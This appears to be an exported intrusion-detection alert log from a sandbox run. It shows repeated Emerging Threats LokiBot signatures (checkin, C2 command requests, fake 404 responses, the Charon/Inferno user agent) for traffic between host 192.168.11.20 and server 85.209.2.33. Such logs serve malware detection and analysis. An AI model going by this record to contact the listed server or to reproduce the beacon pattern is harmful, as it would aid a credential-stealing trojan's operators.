                                                            12/01/21-20:20:35.294981TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:36.189127TCP2025483ET TROJAN LokiBot Fake 404 Response804985385.209.2.33192.168.11.20
                                                            12/01/21-20:20:36.559738TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:36.559738TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:36.559738TCP2025381ET TROJAN LokiBot Checkin4985480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:36.559738TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:37.474410TCP2025483ET TROJAN LokiBot Fake 404 Response804985485.209.2.33192.168.11.20
                                                            12/01/21-20:20:37.920796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:37.920796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:37.920796TCP2025381ET TROJAN LokiBot Checkin4985580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:37.920796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:38.819508TCP2025483ET TROJAN LokiBot Fake 404 Response804985585.209.2.33192.168.11.20
                                                            12/01/21-20:20:39.235163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:39.235163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:39.235163TCP2025381ET TROJAN LokiBot Checkin4985680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:39.235163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:40.120189TCP2025483ET TROJAN LokiBot Fake 404 Response804985685.209.2.33192.168.11.20
                                                            12/01/21-20:20:40.564453TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:40.564453TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:40.564453TCP2025381ET TROJAN LokiBot Checkin4985780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:40.564453TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:41.365394TCP2025483ET TROJAN LokiBot Fake 404 Response804985785.209.2.33192.168.11.20
                                                            12/01/21-20:20:41.789554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:41.789554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:41.789554TCP2025381ET TROJAN LokiBot Checkin4985880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:41.789554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:43.031590TCP2025483ET TROJAN LokiBot Fake 404 Response804985885.209.2.33192.168.11.20
                                                            12/01/21-20:20:43.474513TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:43.474513TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:43.474513TCP2025381ET TROJAN LokiBot Checkin4985980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:43.474513TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:44.328017TCP2025483ET TROJAN LokiBot Fake 404 Response804985985.209.2.33192.168.11.20
                                                            12/01/21-20:20:44.740221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:44.740221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:44.740221TCP2025381ET TROJAN LokiBot Checkin4986080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:44.740221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:46.152135TCP2025483ET TROJAN LokiBot Fake 404 Response804986085.209.2.33192.168.11.20
                                                            12/01/21-20:20:46.584132TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:46.584132TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:46.584132TCP2025381ET TROJAN LokiBot Checkin4986380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:46.584132TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:47.480718TCP2025483ET TROJAN LokiBot Fake 404 Response804986385.209.2.33192.168.11.20
                                                            12/01/21-20:20:47.907329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:47.907329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:47.907329TCP2025381ET TROJAN LokiBot Checkin4986480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:47.907329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.11.2085.209.2.33
                                                            12/01/21-20:20:48.817680TCP2025483ET TROJAN LokiBot Fake 404 Response804986485.209.2.33192.168.11.20
                                                            12/01/21-20:20:49.281673TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:49.281673TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:49.281673TCP2025381ET TROJAN LokiBot Checkin4986580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:49.281673TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.11.2085.209.2.33
                                                            12/01/21-20:20:50.157218TCP2025483ET TROJAN LokiBot Fake 404 Response804986585.209.2.33192.168.11.20
                                                            12/01/21-20:20:50.592369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:50.592369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:50.592369TCP2025381ET TROJAN LokiBot Checkin4986680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:50.592369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.11.2085.209.2.33
                                                            12/01/21-20:20:51.396393TCP2025483ET TROJAN LokiBot Fake 404 Response804986685.209.2.33192.168.11.20
                                                            12/01/21-20:20:51.839161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:51.839161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:51.839161TCP2025381ET TROJAN LokiBot Checkin4986780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:51.839161TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.11.2085.209.2.33
                                                            12/01/21-20:20:52.788823TCP2025483ET TROJAN LokiBot Fake 404 Response804986785.209.2.33192.168.11.20
                                                            12/01/21-20:20:53.201685TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:53.201685TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:53.201685TCP2025381ET TROJAN LokiBot Checkin4986880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:53.201685TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986880192.168.11.2085.209.2.33
                                                            12/01/21-20:20:54.020002TCP2025483ET TROJAN LokiBot Fake 404 Response804986885.209.2.33192.168.11.20
                                                            12/01/21-20:20:54.454766TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:54.454766TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:54.454766TCP2025381ET TROJAN LokiBot Checkin4986980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:54.454766TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.11.2085.209.2.33
                                                            12/01/21-20:20:55.184013TCP2025483ET TROJAN LokiBot Fake 404 Response804986985.209.2.33192.168.11.20
                                                            12/01/21-20:20:55.607712TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:55.607712TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:55.607712TCP2025381ET TROJAN LokiBot Checkin4987080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:55.607712TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.11.2085.209.2.33
                                                            12/01/21-20:20:56.478455TCP2025483ET TROJAN LokiBot Fake 404 Response804987085.209.2.33192.168.11.20
                                                            12/01/21-20:20:56.921783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:56.921783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:56.921783TCP2025381ET TROJAN LokiBot Checkin4987180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:56.921783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.11.2085.209.2.33
                                                            12/01/21-20:20:57.820014TCP2025483ET TROJAN LokiBot Fake 404 Response804987185.209.2.33192.168.11.20
                                                            12/01/21-20:20:58.263796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:58.263796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:58.263796TCP2025381ET TROJAN LokiBot Checkin4987280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:58.263796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.11.2085.209.2.33
                                                            12/01/21-20:20:59.185625TCP2025483ET TROJAN LokiBot Fake 404 Response804987285.209.2.33192.168.11.20
                                                            12/01/21-20:20:59.639554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:59.639554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:59.639554TCP2025381ET TROJAN LokiBot Checkin4987380192.168.11.2085.209.2.33
                                                            12/01/21-20:20:59.639554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:00.354649TCP2025483ET TROJAN LokiBot Fake 404 Response804987385.209.2.33192.168.11.20
                                                            12/01/21-20:21:00.776411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:00.776411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:00.776411TCP2025381ET TROJAN LokiBot Checkin4987480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:00.776411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:01.736182TCP2025483ET TROJAN LokiBot Fake 404 Response804987485.209.2.33192.168.11.20
                                                            12/01/21-20:21:02.137849TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:02.137849TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:02.137849TCP2025381ET TROJAN LokiBot Checkin4987580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:02.137849TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:02.989849TCP2025483ET TROJAN LokiBot Fake 404 Response804987585.209.2.33192.168.11.20
                                                            12/01/21-20:21:03.428536TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:03.428536TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:03.428536TCP2025381ET TROJAN LokiBot Checkin4987680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:03.428536TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:04.170004TCP2025483ET TROJAN LokiBot Fake 404 Response804987685.209.2.33192.168.11.20
                                                            12/01/21-20:21:04.613176TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:04.613176TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:04.613176TCP2025381ET TROJAN LokiBot Checkin4987780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:04.613176TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:08.511714TCP2025483ET TROJAN LokiBot Fake 404 Response804987785.209.2.33192.168.11.20
                                                            12/01/21-20:21:08.954344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:08.954344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:08.954344TCP2025381ET TROJAN LokiBot Checkin4987880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:08.954344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:09.656017TCP2025483ET TROJAN LokiBot Fake 404 Response804987885.209.2.33192.168.11.20
                                                            12/01/21-20:21:10.088147TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:10.088147TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:10.088147TCP2025381ET TROJAN LokiBot Checkin4987980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:10.088147TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:10.955700TCP2025483ET TROJAN LokiBot Fake 404 Response804987985.209.2.33192.168.11.20
                                                            12/01/21-20:21:11.407655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:11.407655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:11.407655TCP2025381ET TROJAN LokiBot Checkin4988080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:11.407655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:12.312881TCP2025483ET TROJAN LokiBot Fake 404 Response804988085.209.2.33192.168.11.20
                                                            12/01/21-20:21:12.756399TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:12.756399TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:12.756399TCP2025381ET TROJAN LokiBot Checkin4988180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:12.756399TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:13.570596TCP2025483ET TROJAN LokiBot Fake 404 Response804988185.209.2.33192.168.11.20
                                                            12/01/21-20:21:14.012530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:14.012530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:14.012530TCP2025381ET TROJAN LokiBot Checkin4988280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:14.012530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:14.953398TCP2025483ET TROJAN LokiBot Fake 404 Response804988285.209.2.33192.168.11.20
                                                            12/01/21-20:21:15.367855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:15.367855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:15.367855TCP2025381ET TROJAN LokiBot Checkin4988380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:15.367855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:16.218814TCP2025483ET TROJAN LokiBot Fake 404 Response804988385.209.2.33192.168.11.20
                                                            12/01/21-20:21:16.560492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:16.560492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:16.560492TCP2025381ET TROJAN LokiBot Checkin4988580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:16.560492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:17.397266TCP2025483ET TROJAN LokiBot Fake 404 Response804988585.209.2.33192.168.11.20
                                                            12/01/21-20:21:17.819770TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:17.819770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:17.819770TCP2025381ET TROJAN LokiBot Checkin4988680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:17.819770TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:18.778843TCP2025483ET TROJAN LokiBot Fake 404 Response804988685.209.2.33192.168.11.20
                                                            12/01/21-20:21:19.191036TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:19.191036TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:19.191036TCP2025381ET TROJAN LokiBot Checkin4988780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:19.191036TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:20.104266TCP2025483ET TROJAN LokiBot Fake 404 Response804988785.209.2.33192.168.11.20
                                                            12/01/21-20:21:20.535988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:20.535988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:20.535988TCP2025381ET TROJAN LokiBot Checkin4988880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:20.535988TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:21.394350TCP2025483ET TROJAN LokiBot Fake 404 Response804988885.209.2.33192.168.11.20
                                                            12/01/21-20:21:21.810395TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:21.810395TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:21.810395TCP2025381ET TROJAN LokiBot Checkin4988980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:21.810395TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:22.632446TCP2025483ET TROJAN LokiBot Fake 404 Response804988985.209.2.33192.168.11.20
                                                            12/01/21-20:21:23.077690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:23.077690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:23.077690TCP2025381ET TROJAN LokiBot Checkin4989080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:23.077690TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:23.952399TCP2025483ET TROJAN LokiBot Fake 404 Response804989085.209.2.33192.168.11.20
                                                            12/01/21-20:21:24.396487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:24.396487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:24.396487TCP2025381ET TROJAN LokiBot Checkin4989180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:24.396487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:25.306318TCP2025483ET TROJAN LokiBot Fake 404 Response804989185.209.2.33192.168.11.20
                                                            12/01/21-20:21:25.745524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:25.745524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:25.745524TCP2025381ET TROJAN LokiBot Checkin4989280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:25.745524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:26.626658TCP2025483ET TROJAN LokiBot Fake 404 Response804989285.209.2.33192.168.11.20
                                                            12/01/21-20:21:27.062976TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:27.062976TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:27.062976TCP2025381ET TROJAN LokiBot Checkin4989380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:27.062976TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:31.075531TCP2025483ET TROJAN LokiBot Fake 404 Response804989385.209.2.33192.168.11.20
                                                            12/01/21-20:21:31.501887TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:31.501887TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:31.501887TCP2025381ET TROJAN LokiBot Checkin4989480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:31.501887TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:32.361393TCP2025483ET TROJAN LokiBot Fake 404 Response804989485.209.2.33192.168.11.20
                                                            12/01/21-20:21:32.784381TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:32.784381TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:32.784381TCP2025381ET TROJAN LokiBot Checkin4989580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:32.784381TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:33.638575TCP2025483ET TROJAN LokiBot Fake 404 Response804989585.209.2.33192.168.11.20
                                                            12/01/21-20:21:34.031862TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:34.031862TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:34.031862TCP2025381ET TROJAN LokiBot Checkin4989680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:34.031862TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:34.888854TCP2025483ET TROJAN LokiBot Fake 404 Response804989685.209.2.33192.168.11.20
                                                            12/01/21-20:21:35.316954TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:35.316954TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:35.316954TCP2025381ET TROJAN LokiBot Checkin4989780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:35.316954TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:36.221465TCP2025483ET TROJAN LokiBot Fake 404 Response804989785.209.2.33192.168.11.20
                                                            12/01/21-20:21:36.626941TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:36.626941TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:36.626941TCP2025381ET TROJAN LokiBot Checkin4989880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:36.626941TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:37.330138TCP2025483ET TROJAN LokiBot Fake 404 Response804989885.209.2.33192.168.11.20
                                                            12/01/21-20:21:37.759412TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:37.759412TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:37.759412TCP2025381ET TROJAN LokiBot Checkin4989980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:37.759412TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:38.689304TCP2025483ET TROJAN LokiBot Fake 404 Response804989985.209.2.33192.168.11.20
                                                            12/01/21-20:21:39.091804TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:39.091804TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:39.091804TCP2025381ET TROJAN LokiBot Checkin4990080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:39.091804TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:39.988117TCP2025483ET TROJAN LokiBot Fake 404 Response804990085.209.2.33192.168.11.20
                                                            12/01/21-20:21:40.424954TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:40.424954TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:40.424954TCP2025381ET TROJAN LokiBot Checkin4990180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:40.424954TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:41.268572TCP2025483ET TROJAN LokiBot Fake 404 Response804990185.209.2.33192.168.11.20
                                                            12/01/21-20:21:41.673739TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:41.673739TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:41.673739TCP2025381ET TROJAN LokiBot Checkin4990280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:41.673739TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.11.2085.209.2.33
                                                            12/01/21-20:21:42.310405TCP2025483ET TROJAN LokiBot Fake 404 Response804990285.209.2.33192.168.11.20
